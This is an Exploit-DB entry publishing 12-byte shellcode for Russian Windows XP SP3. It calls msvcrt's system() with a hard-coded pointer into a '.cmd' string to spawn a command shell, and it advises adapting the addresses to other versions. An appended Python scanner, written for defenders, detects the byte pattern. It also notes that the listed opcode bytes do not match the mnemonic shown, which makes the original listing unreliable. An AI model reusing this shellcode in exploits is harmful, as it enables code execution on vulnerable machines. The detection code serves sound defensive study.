
win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes



EDB-ID: 13647
CVE: N/A
OSVDB-ID: N/A
Author: lord Kelvin
Published: 2010-03-24
Verified: Not Verified
68 9D 61 F9 77  push 0x77C01345
B8 C7 93 C1 77  mov eax,msvcrt.system
FF D0           call eax
 
In msvcrt.dll at 0x77C01344 we have the string ".cmd"; that's the trick:
pushing 0x77C01345 skips the leading dot, so system() receives "cmd".
The code will work on WinXP SP3 Pro Rus; on other versions you'd better
search for the string and the system(char*) address yourself.
 
Coded by lord Kelvin.
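
A defender's view of the listing above, as an added example that is not part of the original entry: a Python scanner that finds the `push imm32; mov eax, imm32; call eax` byte structure and flags it when both immediates fall in a system-DLL address range. The range, the function name and the padding bytes are assumptions of this example.

```python
import re
import struct

# push imm32 (68), mov eax, imm32 (B8), call eax (FF D0): 12 bytes total.
STUB = re.compile(rb"\x68(.{4})\xB8(.{4})\xFF\xD0", re.DOTALL)

# Assumption: 32-bit Windows system DLLs commonly load in this range.
DLL_LO, DLL_HI = 0x70000000, 0x7FFFFFFF


def find_hardcoded_call_stubs(buf: bytes):
    """Return (offset, pushed_arg, call_target, suspicious) for each match."""
    hits = []
    for m in STUB.finditer(buf):
        # x86 immediates are little-endian 32-bit values.
        arg, target = (struct.unpack("<I", g)[0] for g in m.groups())
        # Two absolute DLL-range addresses in one stub is the telltale sign:
        # position-independent code does not normally hard-code both.
        suspicious = all(DLL_LO <= v <= DLL_HI for v in (arg, target))
        hits.append((m.start(), arg, target, suspicious))
    return hits


# The 12 bytes from the listing, embedded in constructed padding.
# Note: these bytes decode to push 0x77F9619D, while the listing's mnemonic
# column shows 0x77C01345, so the scanner keys on opcode structure and
# address range rather than on exact immediates.
LISTING = bytes.fromhex("689D61F977" "B8C793C177" "FFD0")
SAMPLE = b"\x90" * 8 + LISTING + b"\xCC" * 4

# Constructed benign look-alike: same opcodes, small constants.
BENIGN = bytes.fromhex("6801000000" "B802000000" "FFD0")

if __name__ == "__main__":
    for off, arg, target, sus in find_hardcoded_call_stubs(SAMPLE + BENIGN):
        print(f"offset {off:#04x}: push {arg:#010x}; mov eax, {target:#010x}; "
              f"call eax  suspicious={sus}")
```

Because the immediates change with every OS build and language pack, a signature written this way keeps matching where one pinned to the exact addresses would not.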